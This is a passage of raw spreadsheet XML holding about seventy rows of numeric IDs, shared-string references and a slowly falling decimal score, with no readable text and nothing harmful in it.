    <row r="2867" ht="15.75" customHeight="1">
      <c r="A2867" s="1">
        <v>17085.0</v>
      </c>
      <c r="B2867" s="2">
        <v>4.8628474E7</v>
      </c>
      <c r="C2867" s="2" t="s">
        <v>2676</v>
      </c>
      <c r="D2867" s="2">
        <v>1.0</v>
      </c>
      <c r="E2867" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2867" s="2">
        <v>0.1453576864535769</v>
      </c>
    </row>
    <row r="2868" ht="15.75" customHeight="1">
      <c r="A2868" s="1">
        <v>6748.0</v>
      </c>
      <c r="B2868" s="2">
        <v>4.9388718E7</v>
      </c>
      <c r="C2868" s="2" t="s">
        <v>2677</v>
      </c>
      <c r="D2868" s="2">
        <v>1.0</v>
      </c>
      <c r="E2868" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2868" s="2">
        <v>0.1452380952380952</v>
      </c>
    </row>
    <row r="2869" ht="15.75" customHeight="1">
      <c r="A2869" s="1">
        <v>7061.0</v>
      </c>
      <c r="B2869" s="2">
        <v>5.0216421E7</v>
      </c>
      <c r="C2869" s="2" t="s">
        <v>2678</v>
      </c>
      <c r="D2869" s="2">
        <v>1.0</v>
      </c>
      <c r="E2869" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2869" s="2">
        <v>0.1450617283950617</v>
      </c>
    </row>
    <row r="2870" ht="15.75" customHeight="1">
      <c r="A2870" s="1">
        <v>2730.0</v>
      </c>
      <c r="B2870" s="2">
        <v>3.4983708E7</v>
      </c>
      <c r="C2870" s="2" t="s">
        <v>2679</v>
      </c>
      <c r="D2870" s="2">
        <v>1.0</v>
      </c>
      <c r="E2870" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2870" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="2871" ht="15.75" customHeight="1">
      <c r="A2871" s="1">
        <v>5499.0</v>
      </c>
      <c r="B2871" s="2">
        <v>4.5811909E7</v>
      </c>
      <c r="C2871" s="2" t="s">
        <v>2680</v>
      </c>
      <c r="D2871" s="2">
        <v>1.0</v>
      </c>
      <c r="E2871" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2871" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="2872" ht="15.75" customHeight="1">
      <c r="A2872" s="1">
        <v>7177.0</v>
      </c>
      <c r="B2872" s="2">
        <v>5.05568E7</v>
      </c>
      <c r="C2872" s="2" t="s">
        <v>2681</v>
      </c>
      <c r="D2872" s="2">
        <v>1.0</v>
      </c>
      <c r="E2872" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2872" s="2">
        <v>0.1448087431693989</v>
      </c>
    </row>
    <row r="2873" ht="15.75" customHeight="1">
      <c r="A2873" s="1">
        <v>1186.0</v>
      </c>
      <c r="B2873" s="2">
        <v>2.4677182E7</v>
      </c>
      <c r="C2873" s="2" t="s">
        <v>2682</v>
      </c>
      <c r="D2873" s="2">
        <v>1.0</v>
      </c>
      <c r="E2873" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2873" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="2874" ht="15.75" customHeight="1">
      <c r="A2874" s="1">
        <v>8090.0</v>
      </c>
      <c r="B2874" s="2">
        <v>5.3047877E7</v>
      </c>
      <c r="C2874" s="2" t="s">
        <v>2683</v>
      </c>
      <c r="D2874" s="2">
        <v>1.0</v>
      </c>
      <c r="E2874" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2874" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="2875" ht="15.75" customHeight="1">
      <c r="A2875" s="1">
        <v>9593.0</v>
      </c>
      <c r="B2875" s="2">
        <v>5.6113994E7</v>
      </c>
      <c r="C2875" s="2" t="s">
        <v>2684</v>
      </c>
      <c r="D2875" s="2">
        <v>1.0</v>
      </c>
      <c r="E2875" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2875" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="2876" ht="15.75" customHeight="1">
      <c r="A2876" s="1">
        <v>12370.0</v>
      </c>
      <c r="B2876" s="2">
        <v>2.8820257E7</v>
      </c>
      <c r="C2876" s="2" t="s">
        <v>2685</v>
      </c>
      <c r="D2876" s="2">
        <v>1.0</v>
      </c>
      <c r="E2876" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2876" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="2877" ht="15.75" customHeight="1">
      <c r="A2877" s="1">
        <v>14522.0</v>
      </c>
      <c r="B2877" s="2">
        <v>3.9782191E7</v>
      </c>
      <c r="C2877" s="2" t="s">
        <v>2686</v>
      </c>
      <c r="D2877" s="2">
        <v>1.0</v>
      </c>
      <c r="E2877" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2877" s="2">
        <v>0.1441223832528181</v>
      </c>
    </row>
    <row r="2878" ht="15.75" customHeight="1">
      <c r="A2878" s="1">
        <v>4177.0</v>
      </c>
      <c r="B2878" s="2">
        <v>4.1554532E7</v>
      </c>
      <c r="C2878" s="2" t="s">
        <v>2687</v>
      </c>
      <c r="D2878" s="2">
        <v>1.0</v>
      </c>
      <c r="E2878" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2878" s="2">
        <v>0.1440677966101696</v>
      </c>
    </row>
    <row r="2879" ht="15.75" customHeight="1">
      <c r="A2879" s="1">
        <v>9162.0</v>
      </c>
      <c r="B2879" s="2">
        <v>5.5304387E7</v>
      </c>
      <c r="C2879" s="2" t="s">
        <v>2688</v>
      </c>
      <c r="D2879" s="2">
        <v>1.0</v>
      </c>
      <c r="E2879" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2879" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="2880" ht="15.75" customHeight="1">
      <c r="A2880" s="1">
        <v>10340.0</v>
      </c>
      <c r="B2880" s="2">
        <v>5.7727724E7</v>
      </c>
      <c r="C2880" s="2" t="s">
        <v>2689</v>
      </c>
      <c r="D2880" s="2">
        <v>1.0</v>
      </c>
      <c r="E2880" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2880" s="2">
        <v>0.1438356164383562</v>
      </c>
    </row>
    <row r="2881" ht="15.75" customHeight="1">
      <c r="A2881" s="1">
        <v>5153.0</v>
      </c>
      <c r="B2881" s="2">
        <v>4.4711191E7</v>
      </c>
      <c r="C2881" s="2" t="s">
        <v>2690</v>
      </c>
      <c r="D2881" s="2">
        <v>1.0</v>
      </c>
      <c r="E2881" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2881" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="2882" ht="15.75" customHeight="1">
      <c r="A2882" s="1">
        <v>8445.0</v>
      </c>
      <c r="B2882" s="2">
        <v>5.3960711E7</v>
      </c>
      <c r="C2882" s="2" t="s">
        <v>2691</v>
      </c>
      <c r="D2882" s="2">
        <v>1.0</v>
      </c>
      <c r="E2882" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2882" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="2883" ht="15.75" customHeight="1">
      <c r="A2883" s="1">
        <v>8713.0</v>
      </c>
      <c r="B2883" s="2">
        <v>5.4454499E7</v>
      </c>
      <c r="C2883" s="2" t="s">
        <v>2692</v>
      </c>
      <c r="D2883" s="2">
        <v>1.0</v>
      </c>
      <c r="E2883" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2883" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="2884" ht="15.75" customHeight="1">
      <c r="A2884" s="1">
        <v>17057.0</v>
      </c>
      <c r="B2884" s="2">
        <v>4.8553213E7</v>
      </c>
      <c r="C2884" s="2" t="s">
        <v>2693</v>
      </c>
      <c r="D2884" s="2">
        <v>1.0</v>
      </c>
      <c r="E2884" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2884" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="2885" ht="15.75" customHeight="1">
      <c r="A2885" s="1">
        <v>17368.0</v>
      </c>
      <c r="B2885" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C2885" s="2" t="s">
        <v>2694</v>
      </c>
      <c r="D2885" s="2">
        <v>1.0</v>
      </c>
      <c r="E2885" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2885" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="2886" ht="15.75" customHeight="1">
      <c r="A2886" s="1">
        <v>15389.0</v>
      </c>
      <c r="B2886" s="2">
        <v>4.2793421E7</v>
      </c>
      <c r="C2886" s="2" t="s">
        <v>2695</v>
      </c>
      <c r="D2886" s="2">
        <v>1.0</v>
      </c>
      <c r="E2886" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2886" s="2">
        <v>0.1436507936507937</v>
      </c>
    </row>
    <row r="2887" ht="15.75" customHeight="1">
      <c r="A2887" s="1">
        <v>123.0</v>
      </c>
      <c r="B2887" s="2">
        <v>1.3122958E7</v>
      </c>
      <c r="C2887" s="2" t="s">
        <v>2696</v>
      </c>
      <c r="D2887" s="2">
        <v>1.0</v>
      </c>
      <c r="E2887" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2887" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="2888" ht="15.75" customHeight="1">
      <c r="A2888" s="1">
        <v>410.0</v>
      </c>
      <c r="B2888" s="2">
        <v>1.6746045E7</v>
      </c>
      <c r="C2888" s="2" t="s">
        <v>2697</v>
      </c>
      <c r="D2888" s="2">
        <v>1.0</v>
      </c>
      <c r="E2888" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2888" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="2889" ht="15.75" customHeight="1">
      <c r="A2889" s="1">
        <v>3433.0</v>
      </c>
      <c r="B2889" s="2">
        <v>3.8203038E7</v>
      </c>
      <c r="C2889" s="2" t="s">
        <v>2698</v>
      </c>
      <c r="D2889" s="2">
        <v>1.0</v>
      </c>
      <c r="E2889" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2889" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="2890" ht="15.75" customHeight="1">
      <c r="A2890" s="1">
        <v>5007.0</v>
      </c>
      <c r="B2890" s="2">
        <v>4.4188282E7</v>
      </c>
      <c r="C2890" s="2" t="s">
        <v>2699</v>
      </c>
      <c r="D2890" s="2">
        <v>1.0</v>
      </c>
      <c r="E2890" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2890" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="2891" ht="15.75" customHeight="1">
      <c r="A2891" s="1">
        <v>14663.0</v>
      </c>
      <c r="B2891" s="2">
        <v>4.0433881E7</v>
      </c>
      <c r="C2891" s="2" t="s">
        <v>2700</v>
      </c>
      <c r="D2891" s="2">
        <v>1.0</v>
      </c>
      <c r="E2891" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2891" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="2892" ht="15.75" customHeight="1">
      <c r="A2892" s="1">
        <v>8106.0</v>
      </c>
      <c r="B2892" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C2892" s="2" t="s">
        <v>2701</v>
      </c>
      <c r="D2892" s="2">
        <v>1.0</v>
      </c>
      <c r="E2892" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2892" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="2893" ht="15.75" customHeight="1">
      <c r="A2893" s="1">
        <v>8141.0</v>
      </c>
      <c r="B2893" s="2">
        <v>5.315259E7</v>
      </c>
      <c r="C2893" s="2" t="s">
        <v>2702</v>
      </c>
      <c r="D2893" s="2">
        <v>1.0</v>
      </c>
      <c r="E2893" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2893" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="2894" ht="15.75" customHeight="1">
      <c r="A2894" s="1">
        <v>1743.0</v>
      </c>
      <c r="B2894" s="2">
        <v>2.8818039E7</v>
      </c>
      <c r="C2894" s="2" t="s">
        <v>2703</v>
      </c>
      <c r="D2894" s="2">
        <v>1.0</v>
      </c>
      <c r="E2894" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2894" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="2895" ht="15.75" customHeight="1">
      <c r="A2895" s="1">
        <v>11720.0</v>
      </c>
      <c r="B2895" s="2">
        <v>2.3786107E7</v>
      </c>
      <c r="C2895" s="2" t="s">
        <v>2704</v>
      </c>
      <c r="D2895" s="2">
        <v>1.0</v>
      </c>
      <c r="E2895" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2895" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="2896" ht="15.75" customHeight="1">
      <c r="A2896" s="1">
        <v>11905.0</v>
      </c>
      <c r="B2896" s="2">
        <v>2.5208271E7</v>
      </c>
      <c r="C2896" s="2" t="s">
        <v>2705</v>
      </c>
      <c r="D2896" s="2">
        <v>1.0</v>
      </c>
      <c r="E2896" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2896" s="2">
        <v>0.1431623931623932</v>
      </c>
    </row>
    <row r="2897" ht="15.75" customHeight="1">
      <c r="A2897" s="1">
        <v>25564.0</v>
      </c>
      <c r="B2897" s="2">
        <v>1.4298529E7</v>
      </c>
      <c r="C2897" s="2" t="s">
        <v>2706</v>
      </c>
      <c r="D2897" s="2">
        <v>1.0</v>
      </c>
      <c r="E2897" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2897" s="2">
        <v>0.1430041152263374</v>
      </c>
    </row>
    <row r="2898" ht="15.75" customHeight="1">
      <c r="A2898" s="1">
        <v>11388.0</v>
      </c>
      <c r="B2898" s="2">
        <v>2.1526378E7</v>
      </c>
      <c r="C2898" s="2" t="s">
        <v>2707</v>
      </c>
      <c r="D2898" s="2">
        <v>1.0</v>
      </c>
      <c r="E2898" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2898" s="2">
        <v>0.1429738562091504</v>
      </c>
    </row>
    <row r="2899" ht="15.75" customHeight="1">
      <c r="A2899" s="1">
        <v>11042.0</v>
      </c>
      <c r="B2899" s="2">
        <v>1.8050058E7</v>
      </c>
      <c r="C2899" s="2" t="s">
        <v>2708</v>
      </c>
      <c r="D2899" s="2">
        <v>1.0</v>
      </c>
      <c r="E2899" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2899" s="2">
        <v>0.1427350427350428</v>
      </c>
    </row>
    <row r="2900" ht="15.75" customHeight="1">
      <c r="A2900" s="1">
        <v>5812.0</v>
      </c>
      <c r="B2900" s="2">
        <v>4.6824071E7</v>
      </c>
      <c r="C2900" s="2" t="s">
        <v>2709</v>
      </c>
      <c r="D2900" s="2">
        <v>1.0</v>
      </c>
      <c r="E2900" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2900" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="2901" ht="15.75" customHeight="1">
      <c r="A2901" s="1">
        <v>16210.0</v>
      </c>
      <c r="B2901" s="2">
        <v>4.5691813E7</v>
      </c>
      <c r="C2901" s="2" t="s">
        <v>2710</v>
      </c>
      <c r="D2901" s="2">
        <v>1.0</v>
      </c>
      <c r="E2901" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2901" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="2902" ht="15.75" customHeight="1">
      <c r="A2902" s="1">
        <v>443.0</v>
      </c>
      <c r="B2902" s="2">
        <v>1.7065081E7</v>
      </c>
      <c r="C2902" s="2" t="s">
        <v>2711</v>
      </c>
      <c r="D2902" s="2">
        <v>1.0</v>
      </c>
      <c r="E2902" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2902" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="2903" ht="15.75" customHeight="1">
      <c r="A2903" s="1">
        <v>27300.0</v>
      </c>
      <c r="B2903" s="2">
        <v>2.1316933E7</v>
      </c>
      <c r="C2903" s="2" t="s">
        <v>2712</v>
      </c>
      <c r="D2903" s="2">
        <v>1.0</v>
      </c>
      <c r="E2903" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2903" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="2904" ht="15.75" customHeight="1">
      <c r="A2904" s="1">
        <v>19028.0</v>
      </c>
      <c r="B2904" s="2">
        <v>5.4552795E7</v>
      </c>
      <c r="C2904" s="2" t="s">
        <v>2713</v>
      </c>
      <c r="D2904" s="2">
        <v>1.0</v>
      </c>
      <c r="E2904" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2904" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="2905" ht="15.75" customHeight="1">
      <c r="A2905" s="1">
        <v>14137.0</v>
      </c>
      <c r="B2905" s="2">
        <v>3.7924669E7</v>
      </c>
      <c r="C2905" s="2" t="s">
        <v>2714</v>
      </c>
      <c r="D2905" s="2">
        <v>1.0</v>
      </c>
      <c r="E2905" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2905" s="2">
        <v>0.1424242424242425</v>
      </c>
    </row>
    <row r="2906" ht="15.75" customHeight="1">
      <c r="A2906" s="1">
        <v>17821.0</v>
      </c>
      <c r="B2906" s="2">
        <v>5.0915096E7</v>
      </c>
      <c r="C2906" s="2" t="s">
        <v>2715</v>
      </c>
      <c r="D2906" s="2">
        <v>1.0</v>
      </c>
      <c r="E2906" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2906" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="2907" ht="15.75" customHeight="1">
      <c r="A2907" s="1">
        <v>12983.0</v>
      </c>
      <c r="B2907" s="2">
        <v>3.2695464E7</v>
      </c>
      <c r="C2907" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="D2907" s="2">
        <v>1.0</v>
      </c>
      <c r="E2907" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2907" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="2908" ht="15.75" customHeight="1">
      <c r="A2908" s="1">
        <v>15674.0</v>
      </c>
      <c r="B2908" s="2">
        <v>4.3799915E7</v>
      </c>
      <c r="C2908" s="2" t="s">
        <v>2717</v>
      </c>
      <c r="D2908" s="2">
        <v>1.0</v>
      </c>
      <c r="E2908" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2908" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="2909" ht="15.75" customHeight="1">
      <c r="A2909" s="1">
        <v>4368.0</v>
      </c>
      <c r="B2909" s="2">
        <v>4.2122553E7</v>
      </c>
      <c r="C2909" s="2" t="s">
        <v>2718</v>
      </c>
      <c r="D2909" s="2">
        <v>1.0</v>
      </c>
      <c r="E2909" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2909" s="2">
        <v>0.1417910447761195</v>
      </c>
    </row>
    <row r="2910" ht="15.75" customHeight="1">
      <c r="A2910" s="1">
        <v>8196.0</v>
      </c>
      <c r="B2910" s="2">
        <v>5.3253854E7</v>
      </c>
      <c r="C2910" s="2" t="s">
        <v>2719</v>
      </c>
      <c r="D2910" s="2">
        <v>1.0</v>
      </c>
      <c r="E2910" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2910" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="2911" ht="15.75" customHeight="1">
      <c r="A2911" s="1">
        <v>10043.0</v>
      </c>
      <c r="B2911" s="2">
        <v>5.7092367E7</v>
      </c>
      <c r="C2911" s="2" t="s">
        <v>2720</v>
      </c>
      <c r="D2911" s="2">
        <v>1.0</v>
      </c>
      <c r="E2911" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2911" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="2912" ht="15.75" customHeight="1">
      <c r="A2912" s="1">
        <v>29003.0</v>
      </c>
      <c r="B2912" s="2">
        <v>2.989351E7</v>
      </c>
      <c r="C2912" s="2" t="s">
        <v>2721</v>
      </c>
      <c r="D2912" s="2">
        <v>1.0</v>
      </c>
      <c r="E2912" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2912" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="2913" ht="15.75" customHeight="1">
      <c r="A2913" s="1">
        <v>2274.0</v>
      </c>
      <c r="B2913" s="2">
        <v>3.2527615E7</v>
      </c>
      <c r="C2913" s="2" t="s">
        <v>2722</v>
      </c>
      <c r="D2913" s="2">
        <v>1.0</v>
      </c>
      <c r="E2913" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2913" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="2914" ht="15.75" customHeight="1">
      <c r="A2914" s="1">
        <v>9502.0</v>
      </c>
      <c r="B2914" s="2">
        <v>5.5934473E7</v>
      </c>
      <c r="C2914" s="2" t="s">
        <v>2723</v>
      </c>
      <c r="D2914" s="2">
        <v>1.0</v>
      </c>
      <c r="E2914" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2914" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="2915" ht="15.75" customHeight="1">
      <c r="A2915" s="1">
        <v>11748.0</v>
      </c>
      <c r="B2915" s="2">
        <v>2.4111511E7</v>
      </c>
      <c r="C2915" s="2" t="s">
        <v>2724</v>
      </c>
      <c r="D2915" s="2">
        <v>1.0</v>
      </c>
      <c r="E2915" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2915" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="2916" ht="15.75" customHeight="1">
      <c r="A2916" s="1">
        <v>29358.0</v>
      </c>
      <c r="B2916" s="2">
        <v>3.1649546E7</v>
      </c>
      <c r="C2916" s="2" t="s">
        <v>2725</v>
      </c>
      <c r="D2916" s="2">
        <v>1.0</v>
      </c>
      <c r="E2916" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2916" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="2917" ht="15.75" customHeight="1">
      <c r="A2917" s="1">
        <v>603.0</v>
      </c>
      <c r="B2917" s="2">
        <v>1.9324579E7</v>
      </c>
      <c r="C2917" s="2" t="s">
        <v>2726</v>
      </c>
      <c r="D2917" s="2">
        <v>1.0</v>
      </c>
      <c r="E2917" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2917" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="2918" ht="15.75" customHeight="1">
      <c r="A2918" s="1">
        <v>3111.0</v>
      </c>
      <c r="B2918" s="2">
        <v>3.676617E7</v>
      </c>
      <c r="C2918" s="2" t="s">
        <v>2727</v>
      </c>
      <c r="D2918" s="2">
        <v>1.0</v>
      </c>
      <c r="E2918" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2918" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="2919" ht="15.75" customHeight="1">
      <c r="A2919" s="1">
        <v>3724.0</v>
      </c>
      <c r="B2919" s="2">
        <v>3.9613235E7</v>
      </c>
      <c r="C2919" s="2" t="s">
        <v>2728</v>
      </c>
      <c r="D2919" s="2">
        <v>1.0</v>
      </c>
      <c r="E2919" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2919" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="2920" ht="15.75" customHeight="1">
      <c r="A2920" s="1">
        <v>9907.0</v>
      </c>
      <c r="B2920" s="2">
        <v>5.678411E7</v>
      </c>
      <c r="C2920" s="2" t="s">
        <v>2729</v>
      </c>
      <c r="D2920" s="2">
        <v>1.0</v>
      </c>
      <c r="E2920" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2920" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="2921" ht="15.75" customHeight="1">
      <c r="A2921" s="1">
        <v>189.0</v>
      </c>
      <c r="B2921" s="2">
        <v>1.429461E7</v>
      </c>
      <c r="C2921" s="2" t="s">
        <v>2730</v>
      </c>
      <c r="D2921" s="2">
        <v>1.0</v>
      </c>
      <c r="E2921" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2921" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2922" ht="15.75" customHeight="1">
      <c r="A2922" s="1">
        <v>1310.0</v>
      </c>
      <c r="B2922" s="2">
        <v>2.5700077E7</v>
      </c>
      <c r="C2922" s="2" t="s">
        <v>2731</v>
      </c>
      <c r="D2922" s="2">
        <v>1.0</v>
      </c>
      <c r="E2922" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2922" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2923" ht="15.75" customHeight="1">
      <c r="A2923" s="1">
        <v>2061.0</v>
      </c>
      <c r="B2923" s="2">
        <v>3.1038403E7</v>
      </c>
      <c r="C2923" s="2" t="s">
        <v>2732</v>
      </c>
      <c r="D2923" s="2">
        <v>1.0</v>
      </c>
      <c r="E2923" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2923" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2924" ht="15.75" customHeight="1">
      <c r="A2924" s="1">
        <v>4067.0</v>
      </c>
      <c r="B2924" s="2">
        <v>4.1161926E7</v>
      </c>
      <c r="C2924" s="2" t="s">
        <v>2733</v>
      </c>
      <c r="D2924" s="2">
        <v>1.0</v>
      </c>
      <c r="E2924" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2924" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2925" ht="15.75" customHeight="1">
      <c r="A2925" s="1">
        <v>13342.0</v>
      </c>
      <c r="B2925" s="2">
        <v>3.4694619E7</v>
      </c>
      <c r="C2925" s="2" t="s">
        <v>2734</v>
      </c>
      <c r="D2925" s="2">
        <v>1.0</v>
      </c>
      <c r="E2925" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2925" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2926" ht="15.75" customHeight="1">
      <c r="A2926" s="1">
        <v>33545.0</v>
      </c>
      <c r="B2926" s="2">
        <v>8181075.0</v>
      </c>
      <c r="C2926" s="2" t="s">
        <v>2735</v>
      </c>
      <c r="D2926" s="2">
        <v>1.0</v>
      </c>
      <c r="E2926" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2926" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2927" ht="15.75" customHeight="1">
      <c r="A2927" s="1">
        <v>33547.0</v>
      </c>
      <c r="B2927" s="2">
        <v>8181092.0</v>
      </c>
      <c r="C2927" s="2" t="s">
        <v>2735</v>
      </c>
      <c r="D2927" s="2">
        <v>1.0</v>
      </c>
      <c r="E2927" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2927" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2928" ht="15.75" customHeight="1">
      <c r="A2928" s="1">
        <v>34184.0</v>
      </c>
      <c r="B2928" s="2">
        <v>9947983.0</v>
      </c>
      <c r="C2928" s="2" t="s">
        <v>2736</v>
      </c>
      <c r="D2928" s="2">
        <v>1.0</v>
      </c>
      <c r="E2928" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2928" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="2929" ht="15.75" customHeight="1">
      <c r="A2929" s="1">
        <v>3759.0</v>
      </c>
      <c r="B2929" s="2">
        <v>3.9755785E7</v>
      </c>
      <c r="C2929" s="2" t="s">
        <v>2737</v>
      </c>
      <c r="D2929" s="2">
        <v>1.0</v>
      </c>
      <c r="E2929" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2929" s="2">
        <v>0.1406810035842294</v>
      </c>
    </row>
    <row r="2930" ht="15.75" customHeight="1">
      <c r="A2930" s="1">
        <v>1189.0</v>
      </c>
      <c r="B2930" s="2">
        <v>2.4694868E7</v>
      </c>
      <c r="C2930" s="2" t="s">
        <v>2738</v>
      </c>
      <c r="D2930" s="2">
        <v>1.0</v>
      </c>
      <c r="E2930" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2930" s="2">
        <v>0.1404761904761906</v>
      </c>
    </row>
    <row r="2931" ht="15.75" customHeight="1">
      <c r="A2931" s="1">
        <v>4178.0</v>
      </c>
      <c r="B2931" s="2">
        <v>4.1554532E7</v>
      </c>
      <c r="C2931" s="2" t="s">
        <v>2739</v>
      </c>
      <c r="D2931" s="2">
        <v>1.0</v>
      </c>
      <c r="E2931" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2931" s="2">
        <v>0.1401326699834163</v>
      </c>
    </row>
    <row r="2932" ht="15.75" customHeight="1">
      <c r="A2932" s="1">
        <v>6324.0</v>
      </c>
      <c r="B2932" s="2">
        <v>4.827078E7</v>
      </c>
      <c r="C2932" s="2" t="s">
        <v>2740</v>
      </c>
      <c r="D2932" s="2">
        <v>1.0</v>
      </c>
      <c r="E2932" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2932" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="2933" ht="15.75" customHeight="1">
      <c r="A2933" s="1">
        <v>6584.0</v>
      </c>
      <c r="B2933" s="2">
        <v>4.8967615E7</v>
      </c>
      <c r="C2933" s="2" t="s">
        <v>2741</v>
      </c>
      <c r="D2933" s="2">
        <v>1.0</v>
      </c>
      <c r="E2933" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2933" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
